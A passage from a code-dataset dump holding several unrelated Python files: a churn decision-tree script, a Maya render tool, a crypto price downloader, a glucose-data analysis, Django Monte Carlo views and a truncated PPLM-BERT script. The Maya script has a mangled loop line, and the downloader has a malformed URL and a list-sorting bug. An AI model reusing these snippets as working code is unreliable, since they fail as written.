{:.3f}\".format(tree.score(X_tr_scaled, y_tr))) # 0.997\nprint(\"test data accuracy: {:.3f}\".format(tree.score(X_va_scaled, y_va))) # 0.728 -> overfitting\n\n\n# Decision Tree visualization -------------------------------------------------\n\n #!pip install graphviz \n #!pip install pydotplus \n # Let's not forget to add the path of graphviz to PATH in environment variables \n # Then, restart your Python IDE\n\nfrom sklearn.tree import export_graphviz\nfrom IPython.display import Image\nfrom graphviz import Source\nimport pydotplus\nimport graphviz\n\ndata_feature_names = final_data.columns.values.tolist()\n\ndot_data = export_graphviz(tree, out_file=None, \n feature_names= data_feature_names,\n class_names='Churn')\n\ngraph = Source(dot_data)\npng_bytes = graph.pipe(format='png')\nwith open ('dtree_pipe1.png', 'wb') as f:\n f.write(png_bytes)\n \nImage(png_bytes)\n\n#graph = pydotplus.graph_from_dot_data(dot_data)\n#Image(graph.create_png())\n\n\n# Model tuning - Decision Tree Classification ---------------------------------\ntree2 = DecisionTreeClassifier(max_depth= 10, # original model : 25\n max_leaf_nodes=50,\n # max_features = 10,\n min_samples_leaf = 3,\n random_state=0)\ntree2.fit(X_tr, y_tr)\n\nprint(\"train data accuracy: {:.3f}\".format(tree2.score(X_tr, y_tr))) # 0.831\nprint(\"test data accuracy: {:.3f}\".format(tree2.score(X_va, y_va))) # 0.790\n\n\ndot_data2 = export_graphviz(tree2, out_file=None, \n feature_names = data_feature_names,\n class_names='Churn')\n\ngraph = Source(dot_data2)\npng_bytes2 = graph.pipe(format='png')\nwith open ('dtree_pipe.png', 'wb') as f:\n f.write(png_bytes2)\n \nImage(png_bytes2)\n\n\n# Feature importance ----------------------------------------------------------\nprint(\"feature importance:\\n{}\".format(tree.feature_importances_)) \n\ndef plot_feature_importances_telco(model):\n n_features = final_data.shape[1]\n plt.barh(range(n_features), model.feature_importances_, align='center')\n plt.yticks(np.arange(n_features), final_data.columns)\n plt.xlabel(\"feature importance\")\n plt.ylabel('features')\n plt.ylim(-1, n_features)\n\nfig = plt.figure(figsize=(10,8))\nplot_feature_importances_telco(tree)\n\n\n## find out the most highest accuracy for test dataset ------------------------\nmax=0; numMax= 0; cnt= 0\nl1 = []\nlni = []\nlnr = []\nfor i in range(5, 21):\n for j in range(10, 51):\n for n in range(2, 6):\n print(\"trial #:\", cnt, \"\\n\", \"max_depth: \", i, \"| max_leaf_nodes: \", j, \"| min_samples_leaf: \", n)\n tree = DecisionTreeClassifier(max_depth = i, # original model : 25\n max_leaf_nodes = j,\n min_samples_leaf = n,\n random_state=0)\n tree.fit(X_tr_scaled, y_tr)\n treetest = tree.score(X_va_scaled, y_va)\n print(\"train data accuracy: {:.3f}\".format(tree.score(X_tr_scaled, y_tr))) \n print(\"test data accuracy: {:.3f}\".format(tree.score(X_va_scaled, y_va)))\n lni.append(tree.score(X_tr_scaled, y_tr))\n lnr.append(tree.score(X_va_scaled, y_va))\n cnt += 1\n l1.append(cnt)\n if max < treetest:\n max = treetest\n numMax = cnt\n\n \nprint(max, numMax) \n#0.7865593942262187 381\n\n# Ploting the results ---------------------------------------------------------\nfig = plt.figure(figsize=(12,8))\nplt.plot(lni, \"--\", label=\"train set\", color=\"blue\")\nplt.plot(lnr, \"-\", label=\"test set\", color=\"red\")\nplt.plot(numMax, max, \"o\")\nann = plt.annotate(\"is\" % str(n))\nplt.legend()\nplt.show()\n\n#trial #: 380 \n#max_depth: 7 | max_leaf_nodes: 23 | min_samples_leaf: 2\n#train data accuracy: 0.810\n#test data accuracy: 0.787\n\n\ntree_final = DecisionTreeClassifier(max_depth=7, \n max_leaf_nodes= 23, \n min_samples_leaf = 2,\n random_state=0)\ntree_final.fit(X_tr_scaled, y_tr)\n\nprint(\"train data accuracy: {:.3f}\".format(tree_final.score(X_tr_scaled, y_tr))) # 0.810\nprint(\"test data accuracy: {:.3f}\".format(tree_final.score(X_va_scaled, y_va))) # 0.787\n\n\n# Decision Tree Model Visualization after tuning ------------------------------\ndot_data3 = export_graphviz(tree_final, out_file=None, \n feature_names = data_feature_names,\n class_names='Churn', filled=True)\n\ngraph = Source(dot_data3)\npng_bytes = graph.pipe(format='png')\nwith open ('dtree_pipe_final.png', 'wb') as f:\n f.write(png_bytes)\n \nImage(png_bytes)\n\n\n# Feature importance ----------------------------------------------------------\n\nfig = plt.figure(figsize=(10,8))\nplot_feature_importances_telco(tree_final)\n\n","sub_path":"Telco_Customer_Churn/2.1_telco_feature_engineering_numericalencoding.py","file_name":"2.1_telco_feature_engineering_numericalencoding.py","file_ext":"py","file_size_in_byte":9235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"542680510","text":"import maya.cmds as mc\nimport os\nimport maya.mel as mel\ndef renderSD(filename,start,end,cam,aformat):\n rvw=\"showWindow renderViewWindow\"\n rea=\"renderWindowRenderCamera render renderView \"\n rpa='renderWindowSaveImageCallback \"renderView\" ('+'\"'+filename.replace('\\\\','\\\\\\\\')\n mc.currentTime(int(start))\n i=int(start)\n j=int(end)+1\n while i0:\n if 4-len(stk)==3:\n stk='000'+stk\n elif 4-len(stk)==2:\n stk='00'+stk\n elif 4-len(stk)==1:\n stk='0'+stk\n mel.eval(rpa+'_'+stk+'\"'+') \"'+aformat+'\";')\n mc.currentTime(i)\n i=i+1\ndef aboutIt():\n mc.confirmDialog(t='about it',m='If you want to see the rendering of each frame,open the render window!',b='OK')\n \nif mc.window('RenderInWin',ex=1):\n mc.deleteUI('RenderInWin',window=1)\nmc.window('RenderInWin',t='Render In Maya',wh=(380,240))\nmc.menuBarLayout()\nmc.menu(l='About')\nmc.menuItem(l='About It',c=\"aboutIt()\")\nmc.scrollLayout('scrollLayout')\nmc.columnLayout(adj=1)\nmc.frameLayout(l='Render Setting')\nlistCam=mc.ls(type='camera')\npc=mc.optionMenu(l='select camera')\nfor cam in listCam:\n mc.menuItem(l=cam)\nps=mc.textFieldGrp(l='frame start:',tx=1,cl2=('center','center'))\npe=mc.textFieldGrp(l='frame end:',tx=10,cl2=('center','center'))\nmc.frameLayout(l='output file path:')\nmc.text(l='please enter path+filename')\nfn=mc.textFieldGrp(l='filepath:')\nfm=mc.optionMenu(l='file foemat:')\nmc.menuItem(l='Maya IFF')\nmc.menuItem(l='JPEG')\nmc.menuItem(l='TIFF')\nmc.menuItem(l='Targe')\nmc.menuItem(l='PNG')\nmc.menuItem(l='SGI')\nmc.columnLayout(adj=1)\nmc.button(l='Render',c=\"nformat=mc.optionMenu(fm,q=1,v=1);fName=mc.textFieldGrp(fn,q=1,tx=1);pCam=mc.optionMenu(pc,q=1,v=1);pStart=mc.textFieldGrp(ps,q=1,tx=1);pEnd=mc.textFieldGrp(pe,q=1,tx=1);renderSD(fName,pStart,pEnd,pCam,nformat)\")\nmc.showWindow('RenderInWin')","sub_path":"tool/renderAndSave.py","file_name":"renderAndSave.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"277883786","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Sep 5 18:11:20 2020\n\n@author: wanchenzhang\n\"\"\"\n\n\n# Questions:\n# 1. The basic structure is the same as the s1t1.py but has an additional while loop \n# to constantly retrieve data. It seems didn't work as desired... \nimport pandas as pd\nimport requests\nimport datetime\nimport time\n# Section 1, Task 1\n# Write a function to download histohour data, parameters:\n# fsym: BTC, tsym: USDT, start_time=\"2017-04-01\", end_time=\"2020-04-01\", e='binance'\n# time-zone: UTC\n\ndef get_data(fsym, tsym, start_time, end_time, e):\n \"\"\" returns pandas DataFrame \n \"\"\"\n url = 'https://min-api.cryptocompare.com/data/v2/histohour?'\n fmt = \"%Y-%m-%d %H:%M:%S\"\n start_time = str(datetime.datetime.strptime(start_time, '%Y-%m-%d'))\n start_time = int(time.mktime(time.strptime(start_time, fmt)))\n end_time = str(datetime.datetime.strptime(end_time, '%Y-%m-%d'))\n end_time = int(time.mktime(time.strptime(end_time, fmt)))\n date = end_time\n holder = []\n # Retrieve the data backwards\n while date>start_time:\n # Modify the URL using the given parameters\n url = url+\"fsym=\"+fsym+\"&tsym=\"+tsym+\"&e=\"+e+'&limit=2000'+'toTs='+str(date)\n f = requests.get(url)\n ipdata = f.json()\n df = pd.DataFrame(ipdata['Data']['Data'])\n df = df.iloc[:, 0:-2]\n df['datetime'] = df['time']\n df = df.rename(columns={'volumefrom': 'volume'})\n df = df.rename(columns={'volumeto': 'baseVolume'})\n #for i in range(len(df)):\n #df['datetime'][i] = datetime.datetime.utcfromtimestamp(df['datetime'][i]).strftime(fmt)\n df['datetime'] = pd.to_datetime(df['time'],unit='s')\n print(df)\n holder.append(df)\n # Update the date\n date = df['datetime'][0]\n \n # sort the holder by date ascendingly\n holder = holder.sort_values(by = ['datetime'])\n return holder\n\n\n \n \n\n\n\n\n\n\n\n\n\n\n\n# Use the __main__ section for all of your test cases. \n# This section will automatically be executed when the file is run in Python\nif __name__ == '__main__':\n print(get_data('BTC','USDT', \"2017-04-01\",\"2020-04-01\",'binance'))\n","sub_path":"section1/task1/section1task1.py","file_name":"section1task1.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"107201412","text":"# revised 180130\n# coding:utf-8\nimport xlrd\nimport xlwt\nfrom xlutils.copy import copy\nimport time\n\nfrom dayCount_print import print_excel\n\nclass patient():\n def __init__(self, info):\n self.name = info[0]\n self.age = info[1]\n self.hos_area= info[4]\n self.bld_glu = info[7]\n self.opr_dat = info[8]\n self.opr_tim = info[13]\n\n#def timepoint(p):\n #if (p.opr_tim.find(\"16点30\") >= 0) or (p.opr_tim.find(\"10点30\") >= 0) or (p.opr_tim.find(\"6点\") >= 0) or (p.opr_tim.find(\"早餐前\") >= 0):\n #timetype=1\n #elif (p.opr_tim.find(\"8点30\") >= 0) or (p.opr_tim.find(\"13点\") >= 0) or (p.opr_tim.find(\"19点\") >= 0):\n #timetype=2\n #else:\n #timetype=3\n #return timetype\n\ndef PDvalue_main_jian(filename, sheetname, startDate=\"\", endDate=\"\", district=[]):\n start_time = time.time()\n fd_excel = xlrd.open_workbook(filename) #打开文件\n table = fd_excel.sheet_by_name(sheetname) #读取sheet0\n \n n=0\n i=0 #写到第几行\n n=0 #每个pd里的血糖个数\n \n sum0=0 #每个pd里血糖总和\n \n average0=0 #每个pd里平均血糖\n \n max_row = table.nrows\n pdaverage=[] #pd平均血糖一列\n low_perpd=0 #每个pd中低血糖次数\n pd_withlow=0 #有至少一次低血糖的pd个数\n pdn=[] #每个pd中的血糖个数合集\n \n p0=patient(table.row_values(1)) \n n=1 \n sum0=p0.bld_glu \n if p0.bld_glu <=3.9 :\n low_perpd +=1 \n for r in range(2,max_row):\n p = patient(table.row_values(r)) \n former=patient(table.row_values(r-1))\n former_day=xlrd.xldate_as_tuple(former.opr_dat, 0)[0:3]\n \n p_day = xlrd.xldate_as_tuple(p.opr_dat, 0)[0:3]\n if (startDate != \"\"):\n start_date = tuple(map(int, startDate.split(\"-\")))\n if (start_date > p_day):\n continue\n if (endDate != \"\"):\n end_date = tuple(map(int, endDate.split(\"-\")))\n if (end_date < p_day):\n continue\n if (district != []) and (p.hos_area not in district):\n continue\n\n if (former.name==p.name)and (former_day==p_day):\n \n n+=1\n sum0+=p.bld_glu\n if p.bld_glu <=3.9 :\n low_perpd +=1 \n else:\n if n!=0:\n average0=float(sum0)/float(n)\n if average0!=0:\n pdaverage.append(average0)\n if low_perpd!=0:\n pd_withlow +=1\n low_perpd=0\n pdn.append(n)\n n=1\n sum0=p.bld_glu\n average0=0\n if p.bld_glu <=3.9 :\n low_perpd +=1 \n last=patient(table.row_values(max_row-1))\n last_former=patient(table.row_values(max_row-2))\n last_former_day=xlrd.xldate_as_tuple(last_former.opr_dat, 0)[0:3]\n last_day = xlrd.xldate_as_tuple(last.opr_dat, 0)[0:3] \n if (last_former.name!=last.name)or (last_former_day!=last_day):\n average0=last.bld_glu\n pdaverage.append(average0)\n \n \n \n print_excel(\"不分时刻pd总数\", [len(pdaverage)],2) \n print_excel(\"不分时刻每个pd\", pdaverage,3)\n print_excel(\"不分时刻pd至少一次低血糖的个数\", [pd_withlow],2) \n \n print(\"the project costs: \", time.time()-start_time)\n \nif __name__ == \"__main__\":\n PDvalue_main_jian(\"huge.xlsx\", \"jian\", startDate=\"2018-07-01\", endDate=\"2019-06-30\", \n district=['2病区', '4病区'])\n","sub_path":"patientDay_PDvalue_jian.py","file_name":"patientDay_PDvalue_jian.py","file_ext":"py","file_size_in_byte":3555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"60040397","text":"from django.http import HttpResponse\nfrom django.http import JsonResponse\nfrom django.shortcuts import render\n\nfrom mcarlo_app.data_utils import DataRender, DataExtractor\nfrom mcarlo_app.domain import *\nfrom mcarlo_app.engine import Engine\n\n\ndef home(request):\n return render(request,'home.html')\n\ndef about(request):\n return render(request,'about.html')\n\ndef demo_iteration(request):\n iterationParam = DataExtractor.parse_param_iteration(request)\n if 'show_cvs' not in request.GET and 'show_api' not in request.GET and 'show_graph' not in request.GET:\n return render(request, 'iteration.html', {'param': iterationParam})\n engine = Engine(param=iterationParam)\n strikes = iterationParam.strike\n risk_aversion = iterationParam.risk_aversion\n number_of_iterations = iterationParam.iterations\n payoffs = engine.compute_payoff_by_iterations(number_of_iterations,strikes,risk_aversion)\n output = OutPut(iterationParam)\n output.payoffs = payoffs\n if 'show_cvs' in request.GET:\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = 'attachment; filename=\"monte-carlo-effect-iteration.csv\"'\n return DataRender.to_csv(output,response)\n if 'show_api' in request.GET:\n return JsonResponse(output.as_json())\n if 'show_graph' in request.GET:\n call_graph, graph_put = DataRender.to_graph_iteration(payoffs, strikes)\n return render(request,'iteration.html',{'param': iterationParam, 'output':output,'graph_put': graph_put,'graph_call': call_graph})\n\n\ndef demo_risk(request):\n riskParam = DataExtractor.parse_param_risk(request)\n if 'show_cvs' not in request.GET and 'show_api' not in request.GET and 'show_graph' not in request.GET:\n return render(request, 'risk.html', {'param': riskParam})\n strikes = riskParam.strike\n risk_aversions = riskParam.risk_aversion\n iteration = riskParam.iterations\n engine = Engine(param=riskParam)\n payoffs = engine.compute_payoff_by_risk_aversion(iteration,strikes,risk_aversions)\n output = OutPut(riskParam)\n output.payoffs = payoffs\n if 'show_cvs' in request.GET:\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = 'attachment; filename=\"monte-carlo-effect-risk.csv\"'\n return DataRender.to_csv_risk(output,response)\n if 'show_api' in request.GET:\n return JsonResponse(output.as_json())\n if 'show_graph' in request.GET:\n call_graph, graph_put = DataRender.to_graph_risk(payoffs, strikes)\n return render(request,'risk.html',{'param': riskParam, 'output':output,'graph_put': graph_put,'graph_call': call_graph})\n\n\ndef demo_volatility(request):\n param = DataExtractor.parse_param_volatility(request)\n print(param.as_json())\n if 'show_cvs' not in request.GET and 'show_api' not in request.GET and 'show_graph' not in request.GET:\n return render(request, 'volatility.html', {'param': param})\n engine = Engine(param=param)\n number_of_iterations = 10000\n payoff_vol_stoch, payoff_vol_constant = engine.compute_payoff_by_volatility(number_of_iterations,param.strike,param.risk_aversion)\n json = DataRender.to_json(payoff_vol_stoch, payoff_vol_constant, param)\n if 'show_cvs' in request.GET:\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = 'attachment; filename=\"monte-carlo-effect-volatility.csv\"'\n return DataRender.to_csv_vol(json,response)\n\n if 'show_api' in request.GET:\n return JsonResponse(json.as_json())\n output = zip(payoff_vol_stoch, payoff_vol_constant)\n output_put = zip(payoff_vol_stoch, payoff_vol_constant)\n if 'show_graph' in request.GET:\n call_graph, graph_put = DataRender.to_graph_volatility(payoff_vol_stoch, payoff_vol_constant, param.strike)\n return render(request, 'volatility.html',{'param': param, 'output': output, 'output_put': output_put, 'graph_put': graph_put,'graph_call': call_graph})\n return render(request,'volatility.html',{'param': param})\n\n","sub_path":"mcarlo_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"497878006","text":"#! /usr/bin/env python3\n# coding=utf-8\n# Copyright 2018 The Uber AI Team Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\nExample command with bag of words:\npython examples/run_pplm.py -B space --cond_text \"The president\" --length 100 --gamma 1.5 --num_iterations 3 --num_samples 10 --stepsize 0.01 --window_length 5 --kl_scale 0.01 --gm_scale 0.95\n\nExample command with discriminator:\npython examples/run_pplm.py -D sentiment --class_label 3 --cond_text \"The lake\" --length 10 --gamma 1.0 --num_iterations 30 --num_samples 10 --stepsize 0.01 --kl_scale 0.01 --gm_scale 0.95\n\"\"\"\n\nimport argparse\nimport json\nfrom operator import add\nfrom typing import List, Optional, Tuple, Union\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom graphviz import Digraph\nfrom torch.autograd import Variable\n# make_dot was moved to https://github.com/szagoruyko/pytorchviz\nfrom torchviz import make_dot\n\n\nfrom tqdm import trange\nfrom transformers import BertTokenizer\nfrom transformers.file_utils import cached_path\nfrom transformers.modeling_bert import BertModel,BertForMaskedLM\n\nfrom pplm_classification_head import ClassificationHead\nfrom run_pplm import to_var,top_k_filter,get_bag_of_words_indices_bert,build_bows_one_hot_vectors\nPPLM_BOW = 1\nPPLM_DISCRIM = 2\nPPLM_BOW_DISCRIM = 3\nSMALL_CONST = 1e-15\nBIG_CONST = 1e10\n\nQUIET = 0\nREGULAR = 1\nVERBOSE = 2\nVERY_VERBOSE = 3\nVERBOSITY_LEVELS = {\n 'quiet': QUIET,\n 'regular': REGULAR,\n 'verbose': VERBOSE,\n 'very_verbose': VERY_VERBOSE,\n}\n\nBAG_OF_WORDS_ARCHIVE_MAP = {\n 'legal': \"https://s3.amazonaws.com/models.huggingface.co/bert/pplm/bow/legal.txt\",\n 'military': \"https://s3.amazonaws.com/models.huggingface.co/bert/pplm/bow/military.txt\",\n 'monsters': \"https://s3.amazonaws.com/models.huggingface.co/bert/pplm/bow/monsters.txt\",\n 'politics': \"https://s3.amazonaws.com/models.huggingface.co/bert/pplm/bow/politics.txt\",\n 'positive_words': \"https://s3.amazonaws.com/models.huggingface.co/bert/pplm/bow/positive_words.txt\",\n 'religion': \"https://s3.amazonaws.com/models.huggingface.co/bert/pplm/bow/religion.txt\",\n 'science': \"https://s3.amazonaws.com/models.huggingface.co/bert/pplm/bow/science.txt\",\n 'space': \"https://s3.amazonaws.com/models.huggingface.co/bert/pplm/bow/space.txt\",\n 'technology': \"https://s3.amazonaws.com/models.huggingface.co/bert/pplm/bow/technology.txt\",\n}\n\nDISCRIMINATOR_MODELS_PARAMS = {\n \"clickbait\": {\n \"url\": \"https://s3.amazonaws.com/models.huggingface.co/bert/pplm/discriminators/clickbait_classifier_head.pt\",\n \"class_size\": 2,\n \"embed_size\": 1024,\n \"class_vocab\": {\"non_clickbait\": 0, \"clickbait\": 1},\n \"default_class\": 1,\n \"pretrained_model\": \"gpt2-medium\",\n },\n \"sentiment\": {\n \"url\": \"https://s3.amazonaws.com/models.huggingface.co/bert/pplm/discriminators/SST_classifier_head.pt\",\n \"class_size\": 5,\n \"embed_size\": 1024,\n \"class_vocab\": {\"very_positive\": 2, \"very_negative\": 3},\n \"default_class\": 3,\n \"pretrained_model\": \"gpt2-medium\",\n },\n}\ndef getBack(var_grad_fn):\n print(var_grad_fn)\n for n in var_grad_fn.next_functions:\n if n[0]:\n try:\n tensor = getattr(n[0], 'variable')\n print(n[0])\n print('Tensor with grad found:', tensor)\n print(' - gradient:', tensor.grad)\n print()\n except AttributeError as e:\n getBack(n[0])\n\n\ndef perturb_hidden_bert(\n all_hidden,\n model,\n masked,\n context = None,\n masked_lm_labels = None,\n unpert_all_hidden=None,\n unpert_logits=None,\n grad_norms=None,\n stepsize=0.01,\n one_hot_bows_vectors=None,\n classifier=None,\n class_label=None,\n loss_type=0,\n num_iterations=3,\n horizon_length=1,\n decay=False,\n gamma=1.5,\n kl_scale=0.01,\n device='cuda',\n verbosity_level=REGULAR\n):\n #This function perturb the hidden representation and output the new hid-rep (for all the masked tokens)\n\n # Generate inital perturbed past\n # Here initialize grad, should only be w.r.t. the parts we are actually updating tho\n # We don't perturb the last layer since it's not meaningful!\n grad_accumulator = [\n (np.zeros(p_.shape).astype(\"float32\"))\n for p_ in all_hidden[:-1]\n ]\n\n decay_mask = 1.0\n #TODO Change this mask so that only unmasked hiddens are updated, can experiment with different setting\n if True:\n window_mask = torch.ones_like(all_hidden[0]).to(device)\n # accumulate perturbations for num_iterations\n loss_per_iter = []\n new_accumulated_hidden = None\n sentence_length = all_hidden[0].shape[1]\n masked_indices = np.where(masked_lm_labels[0].cpu().numpy() > 0)[0]\n is_masked = torch.ones_like(all_hidden[0]).to(device)\n #masked token = 1, unmasked = 0\n is_masked[0][masked_indices] = 0\n unpert_hidden = all_hidden\n\n #we never modify the accumulated_hidden of unmasked tokens!\n accumulated_unmasked_hidden = (unpert_hidden[-1] * (1-is_masked)).sum(1)[0]\n for i in range(num_iterations):\n #in each iteration, update something\n\n if verbosity_level >= VERBOSE:\n print(\"Iteration \", i + 1)\n curr_perturbation = [\n to_var(torch.from_numpy(p_), requires_grad=True, device=device)\n for p_ in grad_accumulator\n ]\n\n # Compute hidden using perturbed hidden\n perturbed_hidden = list(map(add, all_hidden[:-1], curr_perturbation))\n # curr_perturbation[2].register_hook(print('current grad layer [1]', curr_perturbation[0].grad))\n # _, _, _, curr_length, _ = curr_perturbation[0].shape\n ##manually calculate bert outputs\n new_hidden = [h for h in all_hidden]\n for layer_no,layer in enumerate(model.bert.encoder.layer):\n #calculate the output of this layer by applying the module of this layer to hidden of previous layers\n input_hidden = perturbed_hidden[layer_no] * is_masked + new_hidden[layer_no] * (1-is_masked)\n new_hidden[layer_no+1] = layer(hidden_states = input_hidden)[0] \n \n # output_hidden = model.bert.encoder.layer[-1](hidden_states = perturbed_hidden[-1])[0] \n #### _, all_pred_logits, all_hidden = model(input_ids = context, masked_lm_labels = masked_lm_labels)\n #use last layer hidden output for prediction\n all_pred_logits = model.cls(new_hidden[-1]) \n # getBack(loss.grad_fn)\n\n\n # make_dot(loss).view()\n hidden = all_hidden[-1]\n accumulated_masked_hidden = (new_hidden[-1] * is_masked).sum(1)[0]\n new_accumulated_hidden = accumulated_unmasked_hidden + accumulated_masked_hidden\n # new_accumulated_hidden = None\n # TODO: Check the layer-norm consistency of this with trained discriminator (Sumanth)\n #TODO Fix this, GPT2 might be different with Bert here\n #only take the masked token logits for loss calculation\n logits = all_pred_logits[0, masked_indices]\n probs = F.softmax(logits, dim=-1)\n\n loss = 0.0\n loss_list = []\n if loss_type == PPLM_BOW or loss_type == PPLM_BOW_DISCRIM:\n for one_hot_bow in one_hot_bows_vectors:\n bow_logits = torch.mm(probs, torch.t(one_hot_bow))\n bow_loss = -torch.log(torch.sum(bow_logits))\n loss += bow_loss\n loss_list.append(bow_loss)\n if verbosity_level >= VERY_VERBOSE:\n print(\" pplm_bow_loss:\", loss.data.cpu().numpy())\n if loss_type == PPLM_DISCRIM or loss_type == PPLM_BOW_DISCRIM:\n ce_loss = torch.nn.CrossEntropyLoss()\n\n # curr_score = torch.unsqueeze(probs, dim=1)\n ##For bert horizon_length should always be 0! so the below part is not necessary\n horizon_length = 0\n # wte = model.resize_token_embeddings()\n # for _ in range(horizon_length):\n # inputs_embeds = torch.matmul(curr_score, wte.weight.data)\n # _, curr_unpert_past, curr_all_hidden = model(\n # past=curr_unpert_past,\n # inputs_embeds=inputs_embeds\n # )\n # curr_hidden = curr_all_hidden[-1]\n # new_accumulated_hidden = new_accumulated_hidden + torch.sum(\n # curr_hidden, dim=1)\n #TODO do we include the bos and eos tokens?\n prediction = classifier(new_accumulated_hidden /\n sentence_length)\n\n label = torch.tensor(class_label,\n device=device,\n dtype=torch.long)\n #had to have a dimension for batchsize\n discrim_loss = ce_loss(prediction.unsqueeze(0), label.unsqueeze(0))\n if verbosity_level >= VERY_VERBOSE:\n print(\" pplm_discrim_loss:\", discrim_loss.data.cpu().numpy())\n loss += discrim_loss\n loss_list.append(discrim_loss)\n\n kl_loss = 0.0\n if kl_scale > 0.0:\n #calculate kl loss\n unpert_probs = F.softmax(unpert_logits[0, masked_indices, :], dim=-1)\n unpert_probs = (\n unpert_probs + SMALL_CONST *\n (unpert_probs <= SMALL_CONST).float().to(device).detach()\n )\n correction = SMALL_CONST * (probs <= SMALL_CONST).float().to(\n device).detach()\n corrected_probs = probs + correction.detach()\n kl_loss = kl_scale * (\n (corrected_probs * (corrected_probs / unpert_probs).log()).sum()\n )\n if verbosity_level >= VERY_VERBOSE:\n print(' kl_loss', kl_loss.data.cpu().numpy())\n loss += kl_loss\n\n loss_per_iter.append(loss.data.cpu().numpy())\n if verbosity_level >= VERBOSE:\n print(' pplm_loss', (loss - kl_loss).data.cpu().numpy())\n\n # compute gradients\n loss.backward()\n\n # calculate gradient norms\n # TODO Double check if we indid only calculated grad on (K,V) pairs of the masked tokens\n if grad_norms is not None and loss_type == PPLM_BOW:\n grad_norms = [torch.max(grad_norms[index], torch.norm(p_.grad * window_mask))\n for index, p_ in enumerate(curr_perturbation)]\n else:\n grad_norms = [ (torch.norm(p_.grad * window_mask) + SMALL_CONST)\n for index, p_ in enumerate(curr_perturbation)]\n\n # normalize gradients\n grad = [\n -stepsize *\n (p_.grad * window_mask / grad_norms[\n index] ** gamma).data.cpu().numpy()\n for index, p_ in enumerate(curr_perturbation)\n ]\n\n # accumulate gradient\n grad_accumulator = list(map(add, grad, grad_accumulator))\n\n # reset gradients, just to make sure\n for p_ in curr_perturbation:\n p_.grad.data.zero_()\n\n # removing past from the graph\n # new_past = []\n # for p_ in past:\n # new_past.append(p_.detach())\n # past = new_past\n\n # apply the accumulated perturbations to the past\n ##\n grad_accumulator = [\n to_var(torch.from_numpy(p_), requires_grad=True, device=device)\n for p_ in grad_accumulator\n ]\n perturbed_hidden = list(map(add, all_hidden, grad_accumulator))\n\n return perturbed_hidden, new_accumulated_hidden, grad_norms, loss_per_iter\n\n\ndef full_text_generation_bert(\n model,\n tokenizer,\n context=None,\n masked_indices = None,\n masked_lm_labels = None,\n num_samples=1,\n device=\"cuda\",\n bag_of_words=None,\n discrim=None,\n class_label=None,\n stepsize=0.02,\n temperature=1.0,\n top_k=10,\n sample=True,\n num_iterations=3,\n grad_length=10000,\n horizon_length=1,\n window_length=0,\n decay=False,\n gamma=1.5,\n gm_scale=0.9,\n kl_scale=0.01,\n verbosity_level=REGULAR,\n **kwargs\n):\n classifier, class_id = get_classifier( discrim, class_label, device )\n\n bow_indices = []\n if bag_of_words:\n bow_indices = get_bag_of_words_indices_bert(bag_of_words.split(\";\"),\n tokenizer)\n\n if bag_of_words and classifier:\n loss_type = PPLM_BOW_DISCRIM\n if verbosity_level >= REGULAR:\n print(\"Both PPLM-BoW and PPLM-Discrim are on. \"\n \"This is not optimized.\")\n\n elif bag_of_words:\n loss_type = PPLM_BOW\n if verbosity_level >= REGULAR:\n print(\"Using PPLM-BoW\")\n\n elif classifier is not None:\n loss_type = PPLM_DISCRIM\n if verbosity_level >= REGULAR:\n print(\"Using PPLM-Discrim\")\n\n else:\n raise Exception(\"Specify either a bag of words or a discriminator\")\n\n unpert_gen_tok_text, _, _ = generate_text_pplm_bert(\n #this is just letting bert does its job without changing anything\n model=model,\n tokenizer=tokenizer,\n masked_indices = masked_indices,\n masked_lm_labels=masked_lm_labels,\n context=context,\n device=device,\n sample=sample,\n perturb=False,\n verbosity_level=verbosity_level\n )\n if device == 'cuda':\n torch.cuda.empty_cache()\n\n pert_gen_tok_texts = []\n discrim_losses = []\n losses_in_time = []\n for i in range(num_samples):\n pert_gen_tok_text, discrim_loss, loss_in_time = generate_text_pplm_bert(\n model=model,\n tokenizer=tokenizer,\n context=context,\n masked_indices = masked_indices,\n masked_lm_labels=masked_lm_labels,\n device=device,\n perturb=True,\n bow_indices=bow_indices,\n classifier=classifier,\n class_label=class_id,\n loss_type=loss_type,\n stepsize=stepsize,\n temperature=temperature,\n top_k=top_k,\n sample=sample,\n num_iterations=num_iterations,\n grad_length=grad_length,\n horizon_length=horizon_length,\n decay=decay,\n gamma=gamma,\n gm_scale=gm_scale,\n kl_scale=kl_scale,\n verbosity_level=verbosity_level\n )\n pert_gen_tok_texts.append(pert_gen_tok_text)\n if classifier is not None:\n discrim_losses.append(discrim_loss.data.cpu().numpy())\n losses_in_time.append(loss_in_time)\n\n if device == 'cuda':\n torch.cuda.empty_cache()\n\n return unpert_gen_tok_text, pert_gen_tok_texts, discrim_losses, losses_in_time\n\n\ndef generate_text_pplm_bert(\n model,\n tokenizer,\n context=None,\n masked_indices = None,\n masked_lm_labels = None,\n all_hidden=None,\n device=\"cuda\",\n perturb=True,\n bow_indices=None,\n classifier=None,\n class_label=None,\n loss_type=0,\n stepsize=0.02,\n temperature=1.0,\n top_k=10,\n sample=True,\n num_iterations=3,\n grad_length=10000,\n horizon_length=1,\n window_length=0,\n decay=False,\n gamma=1.5,\n gm_scale=0.9,\n kl_scale=0.01,\n 